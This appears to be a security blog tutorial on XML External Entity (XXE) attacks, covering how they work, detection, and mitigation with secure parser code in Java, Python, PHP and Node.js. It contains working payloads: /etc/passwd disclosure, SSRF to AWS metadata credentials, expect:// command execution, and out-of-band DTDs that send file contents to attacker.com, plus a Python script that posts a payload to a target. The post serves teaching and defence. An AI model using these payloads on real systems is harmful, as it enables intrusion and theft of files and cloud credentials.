XXE Attacks: Understanding and Exploiting XML External Entity Vulnerabilities

January 15, 2025
by Kieran Jessup

What is XXE?

XML External Entity (XXE) attacks are a web security vulnerability that arises when an application parses attacker-supplied XML with a parser configured to resolve external entity references. This vulnerability can lead to:

  • File Disclosure: Reading sensitive files from the server
  • Server-Side Request Forgery (SSRF): Making requests to internal services
  • Remote Code Execution (RCE): In some cases, executing arbitrary code
  • Denial of Service (DoS): Through entity expansion attacks
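
The denial-of-service case is easiest to appreciate with a little arithmetic. The sketch below assumes the classic "billion laughs" layout (a 3-byte base entity, then 9 nested levels that each reference the previous level 10 times); the function name and parameters are illustrative, not taken from any library.

```python
def expanded_size(base_len: int, fanout: int, levels: int) -> int:
    """Bytes produced when the top-level nested entity is fully expanded."""
    # Each nesting level multiplies the previous level's expansion by `fanout`.
    return base_len * fanout ** levels


# Assumed layout: "lol" (3 bytes), 9 nested levels, 10 references per level.
size = expanded_size(base_len=3, fanout=10, levels=9)
print(f"{size:,} bytes (~{size / 1024**3:.1f} GiB) after expansion")
```

The growth is exponential in the nesting depth, which is why parsers that cap entity expansion, or refuse DTDs altogether, are unaffected.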

How XXE Works

XML External Entity Basics
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

Understanding XXE Vulnerabilities

XML External Entity Structure:

XXE attacks leverage the XML DOCTYPE declaration to define external entities that reference external resources. When the XML parser processes these entities, it attempts to fetch the referenced content.

Key Components:
  • DOCTYPE Declaration: Defines the document type and entities
  • ENTITY Definition: Creates a reference to an external resource
  • SYSTEM Keyword: Indicates the entity references an external URI
  • Entity Reference: &xxe; marks the position where the parser substitutes the fetched content
Attack Flow:
  1. Attacker sends malicious XML with external entity reference
  2. XML parser processes the DOCTYPE declaration
  3. Parser attempts to fetch the external resource
  4. Content is included in the XML document
  5. Response may contain sensitive data
MITRE ATT&CK: T1190 - Exploit Public-Facing Application
OWASP Top 10: A05:2021 - Security Misconfiguration
CWE: CWE-611 - Improper Restriction of XML External Entity Reference
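
The substitution step in the attack flow can be observed safely with an internal entity, which exercises the same DOCTYPE and entity-reference machinery without touching any external resource. This is a minimal sketch using Python's standard-library ElementTree; the document and the entity name `greeting` are made up for illustration.

```python
import xml.etree.ElementTree as ET

# Harmless internal entity: the replacement text is declared inline,
# so nothing is fetched from disk or the network.
DOC = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY greeting "hello from the DTD">
]>
<foo>&greeting;</foo>"""

root = ET.fromstring(DOC)
print(root.text)  # the reference has been replaced by the entity's value
```

An external entity differs only in where the replacement text comes from: the SYSTEM URI instead of an inline string. A parser that resolves it therefore embeds file or HTTP content at the same position.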

Common XXE Attack Vectors

1. File Disclosure

The most common XXE attack involves reading sensitive files from the server:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

This payload attempts to read the /etc/passwd file, which contains user account information.

2. SSRF via XXE

XXE can be used to perform Server-Side Request Forgery attacks:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://internal-service:8080/admin">]>
<foo>&xxe;</foo>

This can help attackers discover and access internal services that aren’t directly accessible from the internet.

3. Out-of-Band (OOB) XXE

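When the application does not return the entity's value in its response, attackers can use OOB techniques that make the server send the data to a host they control. The document only needs to load the external DTD; the exfiltration request fires while that DTD is processed, so the body carries no entity reference:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;]>
<foo>test</foo>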

With the external DTD file containing:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%send;
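
On the receiving side, the exfiltrated data arrives as the query string of an ordinary HTTP request. This is a minimal sketch of decoding it from an access-log request line, assuming the `x` parameter name used in the DTD above; the helper name and the sample log line are hypothetical.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit


def extract_exfil(request_line: str, param: str = "x") -> Optional[str]:
    """Return the decoded value of `param` from an HTTP request line, if present."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    query = urlsplit(parts[1]).query
    values = parse_qs(query, keep_blank_values=True).get(param)
    return values[0] if values else None


# Hypothetical log entry written when the target resolves %send;
line = "GET /?x=web01.internal.example HTTP/1.1"
print(extract_exfil(line))
```

Single-line files tend to travel through this channel most reliably, because newlines in the file content may produce a URL that the parser refuses to request.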

Real-World XXE Example

Let’s examine a practical XXE vulnerability in a web application:

XXE Payload Injection

Request
POST https://vulnerable-app.com/api/process
Content-Type: application/xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: */*
Content-Length: 156
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>
<name>&xxe;</name>
<email>test@example.com</email>
</user>
Response
HTTP/1.1 200 OK
Content-Type: application/json
Server: nginx/1.18.0
{
"status": "success",
"user": {
  "name": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin",
  "email": "test@example.com"
}
}
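
A response like this one can be recognized automatically. The sketch below is a heuristic, not a definitive detector: it assumes that leaked content follows the seven-field /etc/passwd layout with absolute home and shell paths, and both the pattern and the function name are illustrative.

```python
import re

# name:password:UID:GID:gecos:home:shell, with absolute home and shell paths
PASSWD_ENTRY = re.compile(r"[a-z_][a-z0-9_-]*:[^:\s]*:\d+:\d+:[^:\n]*:/[^:\s]*:/\S*")


def looks_like_passwd(body: str) -> bool:
    """Heuristic check for /etc/passwd-style content anywhere in a response body."""
    return PASSWD_ENTRY.search(body) is not None


leaked = '{"user": {"name": "root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"}}'
clean = '{"user": {"name": "alice", "email": "test@example.com"}}'
print(looks_like_passwd(leaked), looks_like_passwd(clean))
```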

Advanced XXE Techniques

1. Parameter Entity Expansion

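For more complex attacks, parameter entities (declared with % and usable only inside the DTD) can build new entity declarations on the fly. The XML specification does not allow parameter entity references inside declarations in the internal DTD subset, so the nested declarations have to live in an external DTD that the document loads:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<data>1</data>

With evil.dtd containing:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;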

2. XXE in Different Protocols

XXE can exploit various protocols beyond file://:

Protocol Exploitation
# File Protocol
<!ENTITY xxe SYSTEM "file:///etc/passwd">

# HTTP Protocol  
<!ENTITY xxe SYSTEM "http://internal-service/admin">

# FTP Protocol
<!ENTITY xxe SYSTEM "ftp://attacker.com/evil">

# PHP Wrapper
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=config.php">

# Data Protocol
<!ENTITY xxe SYSTEM "data://text/plain;base64,PD94bWw+">

XXE Protocol Support

Protocol Support in XXE:

Different XML parsers support various protocols for external entity resolution. The supported protocols determine the attack vectors available to attackers.

Common Protocols:
  • file:// - Read local files (most common)
  • http:// - Make HTTP requests (SSRF)
  • ftp:// - FTP protocol support
  • php:// - PHP stream wrappers
  • data:// - Data URI scheme
  • gopher:// - Gopher protocol (rare)
PHP Wrapper Techniques:

PHP applications often support stream wrappers that can be exploited:

  • Base64 Encoding: php://filter/read=convert.base64-encode/resource=file
  • Zlib Compression: php://filter/read=zlib.deflate/resource=file
  • Input Filtering: php://input for POST data processing
Security Implications:
  • File disclosure across multiple protocols
  • Internal network reconnaissance
  • Bypass of access controls
  • Data exfiltration via multiple channels
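
For log review or request triage, it can help to list which URI schemes a submitted document tries to use. The sketch below is a regex-based approximation rather than a real DTD parser: it only looks at SYSTEM identifiers (PUBLIC identifiers are not covered), and the function name is illustrative.

```python
import re
from typing import List
from urllib.parse import urlsplit

# Matches the system identifier in declarations such as <!ENTITY xxe SYSTEM "...">
SYSTEM_ID = re.compile(r"""<!ENTITY\s+(?:%\s+)?[\w.-]+\s+SYSTEM\s+(["'])(.*?)\1""", re.DOTALL)


def system_schemes(xml_text: str) -> List[str]:
    """Return the URI scheme of every SYSTEM entity declared in `xml_text`."""
    return [urlsplit(m.group(2)).scheme.lower() for m in SYSTEM_ID.finditer(xml_text)]


sample = """<!DOCTYPE foo [
<!ENTITY a SYSTEM "file:///etc/passwd">
<!ENTITY % b SYSTEM "http://attacker.com/evil.dtd">
<!ENTITY c SYSTEM 'php://filter/read=convert.base64-encode/resource=config.php'>
]>"""
print(system_schemes(sample))
```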

3. XXE in Different File Formats

XXE isn’t limited to standalone XML files. Many formats are XML-based or embed XML:

  • Office Documents: .docx, .xlsx, .pptx
  • PDF Files: Some PDF parsers support XML
  • SVG Images: Scalable Vector Graphics
  • SOAP APIs: Web services using XML
  • RSS Feeds: Really Simple Syndication
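
Office documents are ZIP archives of XML parts, so an upload handler can look inside them before any XML parser runs. This is a minimal sketch, assuming that legitimate parts are not expected to carry a DTD. The byte search would miss UTF-16 encoded parts, and the function name is illustrative.

```python
import io
import re
import zipfile
from typing import List

DOCTYPE = re.compile(rb"<!DOCTYPE")


def members_with_doctype(archive: bytes) -> List[str]:
    """List XML parts inside a ZIP-based document that declare a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name in zf.namelist():
            if name.lower().endswith((".xml", ".rels")) and DOCTYPE.search(zf.read(name)):
                flagged.append(name)
    return flagged


# Build a tiny in-memory archive that mimics a tampered .docx
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("word/document.xml", '<!DOCTYPE x [<!ENTITY e SYSTEM "file:///etc/passwd">]><x>&e;</x>')
    zf.writestr("docProps/app.xml", "<Properties/>")
print(members_with_doctype(buf.getvalue()))
```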

Detection and Exploitation

1. Identifying XXE Vulnerabilities

XXE Detection Methods
# 1. Look for XML Processing
- SOAP APIs
- REST APIs accepting XML
- File upload functionality
- Document processing

# 2. Test with Simple Payload
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<test>&xxe;</test>

# 3. Monitor for Outbound Requests
- Check server logs
- Monitor network traffic
- Use Burp Collaborator

# 4. Error-Based Detection
- Look for XML parsing errors
- Check for file path disclosures
- Monitor for timeout responses

Finding XXE Vulnerabilities

XXE Detection Strategy:

Identifying XXE vulnerabilities requires a systematic approach to find XML processing endpoints and test their security.

Common Entry Points:
  • API Endpoints: REST/SOAP services accepting XML
  • File Uploads: Document processing applications
  • Form Submissions: Web forms that process XML data
  • Import Features: Data import functionality
  • Search Functions: Advanced search with XML queries
Testing Methodology:
  1. Reconnaissance: Identify XML processing endpoints
  2. Basic Testing: Send simple XXE payloads
  3. Error Analysis: Monitor for parsing errors
  4. Outbound Testing: Use OOB techniques
  5. Protocol Testing: Test different URI schemes
Indicators of Vulnerability:
  • XML parsing errors in responses
  • File content appearing in responses
  • Outbound HTTP requests to attacker servers
  • Timeout responses indicating processing delays
  • Error messages revealing file paths
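
For the outbound-request indicator, each probe is easier to attribute when it carries a unique token. The sketch below assumes a listener that logs requests for any subdomain of a domain you control. The domain `oob.example.net` and the function name are hypothetical.

```python
import secrets
from typing import Tuple


def build_oob_probe(callback_host: str) -> Tuple[str, str]:
    """Return (token, payload); the token identifies this probe in callback logs."""
    token = secrets.token_hex(8)  # 16 hex characters, usable as a DNS label
    payload = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE probe [\n"
        f'<!ENTITY % ping SYSTEM "http://{token}.{callback_host}/">\n'
        "%ping;\n"
        "]>\n"
        "<probe/>"
    )
    return token, payload


token, payload = build_oob_probe("oob.example.net")  # hypothetical listener domain
print(payload)
```

A DNS lookup or HTTP hit containing the token then ties the callback to the exact endpoint and request that triggered it.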

2. Automated XXE Testing

Several tools can help automate XXE detection:

# OWASP ZAP
zap-cli quick-scan --self-contained --start-options "-config api.disablekey=true" https://target.com

# Burp Suite Professional
# Use the XXE Scanner extension

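# Custom Python Script
import requests

xxe_payload = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>'''

response = requests.post(
    'https://target.com/api/process',
    data=xxe_payload.encode('iso-8859-1'),  # send bytes that match the declared encoding
    headers={'Content-Type': 'application/xml'},
    timeout=10,  # requests waits indefinitely unless a timeout is set
)
# A passwd entry in the body suggests the entity was resolved and reflected
print(response.status_code, 'root:x:0:0' in response.text)
print(response.text)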

Mitigation Strategies

1. Disable External Entity Processing

The most effective mitigation is to disable external entity processing entirely:

Java (SAX Parser):

SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

Python (lxml):

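from lxml import etree
# resolve_entities=False leaves entity references unexpanded; no_network=True blocks remote DTD fetches
parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.parse(xml_file, parser)  # xml_file: path or file object holding the untrusted XML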

PHP:

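// Deprecated since PHP 8.0: with libxml2 2.9.0+ external entities are not loaded unless LIBXML_NOENT is passed
libxml_disable_entity_loader(true);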
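
Python's standard library has no direct equivalent of the disallow-doctype-decl feature, but the same policy can be approximated with an expat pre-check. This is a minimal sketch, assuming the input is small enough to parse twice. `DoctypeForbidden` and `parse_untrusted` are names invented for this example.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    # Called by expat as soon as a DOCTYPE declaration starts.
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML only if it carries no DOCTYPE (and therefore no entity declarations)."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)  # raises DoctypeForbidden or expat.ExpatError
    return ET.fromstring(data)


print(parse_untrusted(b"<foo>ok</foo>").text)
```

Rejecting the DOCTYPE outright removes external entities, parameter entities, and entity-expansion bombs in one step, at the cost of refusing documents that legitimately rely on a DTD.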

2. Input Validation and Sanitization

XXE Mitigation Techniques
# 1. Disable DOCTYPE Processing
- Set disallow-doctype-decl feature
- Disable external entity resolution
- Use secure XML parsers

# 2. Input Validation
- Whitelist allowed XML elements
- Block DOCTYPE declarations
- Validate XML structure

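# 3. Output Handling
- Encode parsed values before placing them in responses
- Return generic errors instead of raw parser messages
- Treat values taken from parsed XML as untrusted input downstream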

# 4. Network Security
- Block outbound requests
- Use firewalls
- Monitor network traffic

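# 5. Security Headers (general hardening only)
- Content Security Policy
- X-Content-Type-Options
- X-Frame-Options
- These are enforced by browsers and do not block server-side entity resolution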

Preventing XXE Attacks

Comprehensive XXE Mitigation:

Preventing XXE attacks requires a multi-layered approach combining technical controls, input validation, and security monitoring.

Technical Controls:
  • Parser Configuration: Disable external entity processing
  • Feature Flags: Use secure XML parser features
  • Library Updates: Keep XML libraries updated
  • Alternative Parsers: Use XXE-resistant parsers
Input Validation:
  • Schema Validation: Use XML Schema (XSD) validation
  • Content Filtering: Block DOCTYPE declarations
  • Element Whitelisting: Only allow expected XML elements
  • Size Limits: Restrict XML document size
Network Security:
  • Outbound Filtering: Block external requests from servers
  • Firewall Rules: Restrict network access
  • Monitoring: Log and alert on suspicious requests
  • Segmentation: Isolate XML processing services
Security Best Practices:
  • Principle of Least Privilege: Minimize server permissions
  • Regular Audits: Test for XXE vulnerabilities
  • Security Training: Educate developers about XXE
  • Incident Response: Have a plan for XXE incidents
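
The input-validation items above can be combined into one gate in front of the application logic. The sketch below is illustrative only: the size cap and the allowed element names are assumptions based on the `<user>` example earlier in this post, and the plain byte search for a DOCTYPE would miss UTF-16 encoded input.

```python
import xml.etree.ElementTree as ET

MAX_BYTES = 64 * 1024                      # hypothetical size cap
ALLOWED_TAGS = {"user", "name", "email"}   # hypothetical schema for the <user> example


def validate(data: bytes) -> ET.Element:
    """Apply size, DOCTYPE, and element allow-list checks before using the document."""
    if len(data) > MAX_BYTES:
        raise ValueError("document too large")
    if b"<!DOCTYPE" in data:
        raise ValueError("DOCTYPE declarations are not accepted")
    root = ET.fromstring(data)
    unexpected = {el.tag for el in root.iter()} - ALLOWED_TAGS
    if unexpected:
        raise ValueError(f"unexpected elements: {sorted(unexpected)}")
    return root


doc = b"<user><name>alice</name><email>test@example.com</email></user>"
print(validate(doc).find("name").text)
```

A full XSD validation step would be stricter than this allow-list; the sketch only shows the order of the checks, with the cheapest ones first.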

3. Secure XML Processing Libraries

Use XXE-resistant XML processing libraries:

Java:

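// JAXB's Unmarshaller has no XXE switches of its own, so hand it a hardened SAX source
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
Source source = new SAXSource(spf.newSAXParser().getXMLReader(), new InputSource(xmlStream)); // xmlStream: the untrusted input
JAXBContext context = JAXBContext.newInstance(MyClass.class);
MyClass result = (MyClass) context.createUnmarshaller().unmarshal(source);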

Python:

# Use defusedxml instead of standard library
from defusedxml import ElementTree
tree = ElementTree.parse(xml_file)

Node.js:

// xml2js builds on the sax parser, which does not load external entities; the options below only shape the output
const xml2js = require('xml2js');
const parser = new xml2js.Parser({
  explicitArray: false,
  ignoreAttrs: true,
  explicitRoot: false
});

Real-World XXE Examples

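1. Apache Flex BlazeDS XXE (CVE-2015-3269)

CVE-2015-3269 is an XXE flaw in Apache Flex BlazeDS, as shipped in Adobe LiveCycle Data Services, that allowed remote attackers to read arbitrary files through an AMF message containing an external entity declaration. The payload below illustrates the same class of attack against a Flash-style cross-domain policy document; it is not the AMF message itself: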

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
&xxe;
</cross-domain-policy>

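2. WordPress XML-RPC (CVE-2017-9062)

WordPress exposes an XML-RPC endpoint that parses client-supplied XML, which makes it a common place to probe for XXE. CVE-2017-9062, fixed in WordPress 4.7.5, is recorded as improper handling of post meta data values in that API rather than as an entity-resolution flaw, so the request below only shows where an entity reference would be injected into an XML-RPC call: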

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>&file;</value></param>
</params>
</methodCall>

XXE in Modern Applications

1. API Security

Modern REST APIs often process XML data and may be vulnerable to XXE:

API XXE Example

Request
POST https://api.example.com/v1/users
Content-Type: application/xml
Authorization: Bearer token123
Accept: application/json
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>
<name>&xxe;</name>
<email>test@example.com</email>
</user>
Response
HTTP/1.1 200 OK
Content-Type: application/json
Server: nginx
{
"id": 123,
"name": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin",
"email": "test@example.com",
"created_at": "2025-01-15T10:30:00Z"
}

2. Cloud Services

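Cloud services and serverless functions that parse XML may also be vulnerable to XXE, and cloud hosts add a high-value SSRF target: the instance metadata service. On an AWS EC2 instance that still allows IMDSv1, a plain GET to the link-local address lists the attached IAM role, and a second request for that role name returns temporary credentials:

<?xml version="1.0" encoding="UTF-8"?>
<!-- AWS EC2 instance metadata (IMDSv1) XXE example -->
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]>
<data>&xxe;</data>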
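
An egress filter or logging hook in front of an XML-processing service can flag destinations like this one. This is a minimal sketch using Python's standard library. It only classifies literal IP addresses (hostnames would need DNS resolution first), and the function name is illustrative.

```python
import ipaddress
from urllib.parse import urlsplit


def is_internal_target(url: str) -> bool:
    """True if the URL's host is a literal IP in a private, loopback, or link-local range."""
    host = urlsplit(url).hostname
    if host is None:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname; it would need DNS resolution to classify
    return addr.is_private or addr.is_loopback or addr.is_link_local


print(is_internal_target("http://169.254.169.254/latest/meta-data/iam/security-credentials/"))
```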

Advanced XXE Exploitation

1. Blind XXE

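When the response never echoes entity values, blind XXE techniques exfiltrate data through a side channel instead. Because parameter entity references are not allowed inside declarations in the internal DTD subset, the document loads an attacker-hosted DTD:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<data>1</data>

The hosted evil.dtd reads the file and sends its contents out in a request URL:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;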

2. XXE for RCE

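In some cases, XXE can lead to remote code execution. The best-known route is PHP's expect:// wrapper, which is available only when the expect extension is installed: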

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "expect://id">]>
<data>&xxe;</data>

Tools and Resources

1. XXE Testing Tools

  • Burp Suite Professional: Built-in XXE scanner
  • OWASP ZAP: Free XXE detection
  • XXEinjector: Ruby-based XXE testing tool
  • XXE-Out-of-Band: OOB XXE exploitation tool

2. Payload Repositories

  • PayloadsAllTheThings: Comprehensive XXE payloads
  • OWASP XXE Cheat Sheet: Official OWASP guidance
  • HackTricks XXE: Practical exploitation techniques

3. Learning Resources

  • PortSwigger XXE Lab: Interactive XXE training
  • OWASP WebGoat: XXE vulnerability training
  • HackTheBox: XXE challenge machines

Conclusion

XXE attacks remain a significant threat to web applications that process XML data. Understanding the vulnerability, exploitation techniques, and mitigation strategies is crucial for security professionals and developers.

Key takeaways:

  1. XXE is still prevalent in modern applications despite being well-known
  2. Multiple attack vectors exist beyond simple file reading
  3. Comprehensive mitigation requires technical controls and security practices
  4. Regular testing is essential to detect XXE vulnerabilities
  5. Security awareness among developers is crucial for prevention

By implementing proper security controls, using secure XML parsers, and maintaining security awareness, organizations can effectively protect against XXE attacks and maintain the security of their applications.

📖 Additional Reading

If you found this XXE guide helpful, you might also be interested in these related posts from my blog:

Practical XXE Examples:

  • HTB - BountyHunter - Real-world XXE exploitation walkthrough with file disclosure and privilege escalation

Learning Path:

  1. Start with: PortSwigger XXE Lab - Interactive XXE training environment
  2. Practice on: HTB - BountyHunter - See XXE in action with a complete walkthrough
  3. Advanced: Apply these techniques to your own testing and bug bounty programs
